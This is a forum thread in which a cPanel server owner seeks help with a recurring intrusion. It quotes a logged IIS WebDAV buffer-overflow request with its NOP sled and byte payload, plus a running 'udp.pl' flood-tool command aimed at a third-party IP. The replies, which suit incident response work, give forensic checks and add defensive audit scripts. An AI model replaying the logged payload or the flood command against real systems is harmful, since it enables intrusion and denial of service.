Server Attack...every day, help:(
Hello,
every day somebody attacks my server, puts some files in my /var/tmp and /tmp/ directories and executes them (on my server I have cPanel/WHM). I searched in the logs (usr/local/apache/domlogs and var/log) for how he does that but I can't find it; the only thing I found today in domlogs is this code. What is this, can he do that with this code, and how can I protect my server if he does it with this code: 66.79.55.12 - - [16/Jul/2004:07:26:54 +0200] "SEARCH /\x90\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x 
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x 
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x 
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x 
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x . . etc. etc. etc. much more... and at the end of this code is this: 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 354 "-" "-" Please somebody help me... this is a big problem for me. Thanks! |
The best thing you can do is back up your important config files and web pages, then format and reinstall the OS.
Read through the security refs on this forum to harden your OS. Ensure you connect your system to the net only after it is properly patched up and the firewall has opened only the ports that you need for your Internet presence. |
But I checked my system with chkrootkit, rkhunter and with Panda free antivirus software and I didn't find trojans, viruses... nothing...
Some other way? Thanks |
Looks like the Apache log entry is an IIS WebDAV exploit, and it's probably not related to the files in /var/tmp or /tmp. What are the files in those directories? I wouldn't go so far as re-installing unless you know that you have a problem that can't be easily undone.
|
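The reply above identifies the log entry from the first post as IIS WebDAV exploit traffic hitting an Apache server. A short awk filter can pull such entries out of a domlog so they are not mistaken for the real intrusion. This is an added example, not code from the thread; it assumes POSIX sh and awk, and the three log lines it runs on are constructed (RFC 5737 documentation addresses), not the poster's log.

```shell
#!/bin/sh
# Added example, not from the thread: flag Apache access-log requests that look like the
# WebDAV SEARCH overflow noise quoted in the first post. Assumes POSIX sh and awk.

# Print "client-ip method" for every request whose method is SEARCH, or whose request
# line carries a run of at least 16 escaped bytes (Apache writes raw bytes as \xNN; a
# long run of \x90 is a NOP sled, not a URL anyone typed).
suspicious_requests() {
    awk '
    {
        # In combined format the request line is the first double-quoted field.
        n = split($0, q, "\"")
        if (n < 2) next
        req = q[2]
        split(req, parts, " ")
        method = parts[1]
        # gsub() returns the number of \xNN escapes; replacing with "&" leaves req unchanged.
        escapes = gsub(/\\x[0-9a-fA-F][0-9a-fA-F]/, "&", req)
        if (method == "SEARCH" || escapes >= 16) {
            print $1, method
        }
    }' "$1"
}

# Number of flagged lines, as a bare integer, for use in scripts.
count_suspicious() {
    suspicious_requests "$1" | wc -l | tr -d ' '
}

# Constructed sample log (documentation addresses, not real clients) written to FILE.
write_sample_log() {
    printf '%s\n' \
        '192.0.2.10 - - [16/Jul/2004:07:26:54 +0200] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x90\x90\x90\x90" 414 354 "-" "-"' \
        '198.51.100.7 - - [16/Jul/2004:07:27:01 +0200] "GET /index.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0"' \
        '203.0.113.4 - - [16/Jul/2004:07:28:13 +0200] "POST /ikonboard.cgi HTTP/1.1" 200 88 "-" "-"' \
        > "$1"
}

# Run with --demo to see the filter on the constructed sample; on a live box call
# suspicious_requests /usr/local/apache/domlogs/<site> directly.
if [ "${1:-}" = "--demo" ]; then
    f=$(mktemp)
    write_sample_log "$f"
    suspicious_requests "$f"
    rm -f "$f"
fi
```

On the sample only the SEARCH line is reported; the normal GET and the POST to ikonboard.cgi pass. A 414 response, as in the poster's entry, means Apache rejected the oversized request line, which is consistent with the reply's point that this traffic is not what planted the files.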
No, I don't use IIS, on my server I use Linux/Apache....
Every day he puts and executes in var/tmp the files "vadimI", "f3", "sh" and some more names... I have a copy of those files on my HD... those files use much CPU... Also, he creates directories in var/tmp with names like "....", ".c", ".x".... But I can't find those files in the logs, how he runs them, copies them to that location...? |
First, you should definitely disconnect the system from the internet.
As a stickman pointed out, the buffer overflow you've posted is a common IIS WebDAV exploit and is likely unrelated to the files. In fact, if the files are appearing every day, it sounds like they're being created locally by a cron job, or by something in the init process if you're rebooting daily, so definitely take a look at cron and crontab. You should probably also take a look at the /etc/passwd file and see if you have any odd users, and especially look for users other than root with a UID of 0. Try searching for strange SUID files (find / -perm -4000 -print) and SGID files (find / -perm -2000 -print) as well.
One thing to keep in mind is that rootkits are really only tools used primarily to hide the presence of a cracker. So it's entirely possible to crack a system and never use a rootkit at all; it just makes the job of hiding a little easier. Even if you do determine that the system has been cracked, remove the files and prevent their re-creation, you will need to re-install from trusted media. If the system's security has been compromised, it's extremely difficult to be sure that no other files are lurking somewhere else in the file system.
When you re-install, look into running a file integrity IDS like tripwire, aide, samhain, etc. With one of these installed, you'll more than likely be able to determine what files have been added to the system or if any critical files have been altered, using a single command. |
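The account and set-ID checks suggested in the reply above (odd /etc/passwd entries, non-root UID 0 accounts, SUID and SGID files) collected into one small audit script. This is an added example, not from the thread; it assumes POSIX sh, awk and find, and the passwd file it demonstrates on is constructed, not the poster's.

```shell
#!/bin/sh
# Added example, not from the thread: the account and set-ID checks recommended above, as
# functions that take the file or directory to inspect as a parameter, so they run against
# a live box (/etc/passwd, /) or against a constructed sample. Assumes POSIX sh, awk, find.

# Accounts other than root whose UID is 0: every such entry is root under another name.
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Accounts that can actually log in (shell is not nologin/false), with UID and shell, so
# the short list can be compared against what the box is supposed to have.
login_accounts() {
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 " uid=" $3 " shell=" $7 }' "$1"
}

# Set-UID or set-GID regular files below DIR, sorted. -xdev stays on one filesystem (so
# /proc is not walked) and errors such as vanished /proc entries are discarded.
setid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Constructed passwd sample: normal root, two service users, a planted UID 0 account.
write_sample_passwd() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
toor:x:0:0::/var/tmp:/bin/bash
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
EOF
}

# Run with --demo to see the checks on the constructed sample; on a live box call
# uid0_accounts /etc/passwd, login_accounts /etc/passwd and setid_files / directly.
if [ "${1:-}" = "--demo" ]; then
    p=$(mktemp)
    write_sample_passwd "$p"
    echo "== non-root accounts with UID 0 =="
    uid0_accounts "$p"
    echo "== accounts with a login shell =="
    login_accounts "$p"
    rm -f "$p"
    echo "== set-ID files under /usr/bin =="
    setid_files /usr/bin
fi
```

On the sample, uid0_accounts reports only "toor"; the login-shell list is root, toor and mysql. Against a real system, compare the setid_files output with the package manager's view (the thread later mentions rpm -Va) rather than judging paths by eye.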
I think that I found where the problem is!
In the "/etc/cron.daily" dir I find many files: 00-logwatch@ logrotate* rpm* 0anacron* makewhatis.cron* slocate.cron* tmpwatch*
Is this normal? Do you have tmpwatch*? When I edit that file I find this:
/usr/sbin/tmpwatch 240 /tmp
/usr/sbin/tmpwatch 720 /var/tmp
for d in /var/{cache/man,catman}/{cat?,X11R6/cat?,local/cat?}; do
    if [ -d "$d" ]; then
        /usr/sbin/tmpwatch -f 720 $d
    fi
done
When I search on Google for "tmpwatch" the first result is: "tmpwatch has a local denial of service and root exploit" Is this the problem? What now?:( |
The contents of cron.daily are pretty normal, except the * and @ characters after the filenames; what Linux distro are you using? Also, don't forget to check crontab as well.
Tmpwatch is a normal Linux application which is used to blow away tmp files that aren't being used. For more info, check out the tmpwatch man page. Have you looked into any of the other advice I've given? |
Today he added and ran a new file in var/tmp, "udp.pl"!
Also, this uses much CPU; when I click on "CPU/Memory/MySQL Usage" in WHM I see this:
Top Process %CPU 89.0 /usr/bin/perl ./udp.pl 200.222.175.87 139 1
Here is a copy of the header (udp.pl):
#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################
Also, how does he run this script? For other scripts like ikonboard I see this for the same user:
Top Process %CPU 67.0 /usr/bin/perl ikonboard.cgi
no "./ikonboard.cgi"!!!
Here is crontab -e output:
2,58 * * * * /usr/local/bandmin/bandmin
0 0 * * * /usr/local/bandmin/ipaddrmap
31 5 * * * /scripts/upcp
*/15 * * * * /usr/local/cpanel/whostmgr/bin/dnsqueue > /dev/null 2>&1
0 6 * * * /scripts/cleanmsglog > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim callout > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim retry > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim reject > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim wait-remote_smtp > /dev/null 2>$
*/5 * * * * /usr/local/cpanel/bin/dcpumon >/dev/null 2>&1
etc/passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/bin/bash
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/html/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/bash
and all users "username:x:3xxxx:3xxxx::/home" (xxxx is some number)
find / -perm -4000 -print:
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/quota
/usr/bin/crontab
/usr/bin/lppasswd
/usr/local/apache/bin/suexec
/usr/local/cpanel/bin/cpwrap
/usr/local/cpanel/bin/jailshell
/usr/local/cpanel/cgi-sys/scgiwrap
/usr/sbin/exim
/usr/sbin/traceroute
/usr/sbin/suexec
/bin/su
find: /proc/3209/fd: No such file or directory
find: /proc/6268/fd: No such file or directory
find: /proc/24270/fd/4: No such file or directory
find: /proc/24586/fd: No such file or directory
find / -perm -2000 -print:
/var/cpanel/users /usr/bin/wall /usr/bin/slocate /usr/local/cpanel/3rdparty/mailman /usr/local/cpanel/3rdparty/mailman/Mailman /usr/local/cpanel/3rdparty/mailman/Mailman/Archiver /usr/local/cpanel/3rdparty/mailman/Mailman/Bouncers /usr/local/cpanel/3rdparty/mailman/Mailman/Cgi /usr/local/cpanel/3rdparty/mailman/Mailman/Handlers /usr/local/cpanel/3rdparty/mailman/Mailman/Logging /usr/local/cpanel/3rdparty/mailman/Mailman/Queue /usr/local/cpanel/3rdparty/mailman/Mailman/MTA /usr/local/cpanel/3rdparty/mailman/Mailman/Gui 
/usr/local/cpanel/3rdparty/mailman/Mailman/Commands /usr/local/cpanel/3rdparty/mailman/archives /usr/local/cpanel/3rdparty/mailman/archives/private /usr/local/cpanel/3rdparty/mailman/archives/private/aa_cpanel3.darkorb.net.mbox /usr/local/cpanel/3rdparty/mailman/archives/private/mailman.mbox /usr/local/cpanel/3rdparty/mailman/archives/private/mailman /usr/local/cpanel/3rdparty/mailman/archives/public /usr/local/cpanel/3rdparty/mailman/bin /usr/local/cpanel/3rdparty/mailman/cgi-bin /usr/local/cpanel/3rdparty/mailman/cgi-bin/handle_opts /usr/local/cpanel/3rdparty/mailman/cgi-bin/admin /usr/local/cpanel/3rdparty/mailman/cgi-bin/admindb /usr/local/cpanel/3rdparty/mailman/cgi-bin/edithtml /usr/local/cpanel/3rdparty/mailman/cgi-bin/subscribe 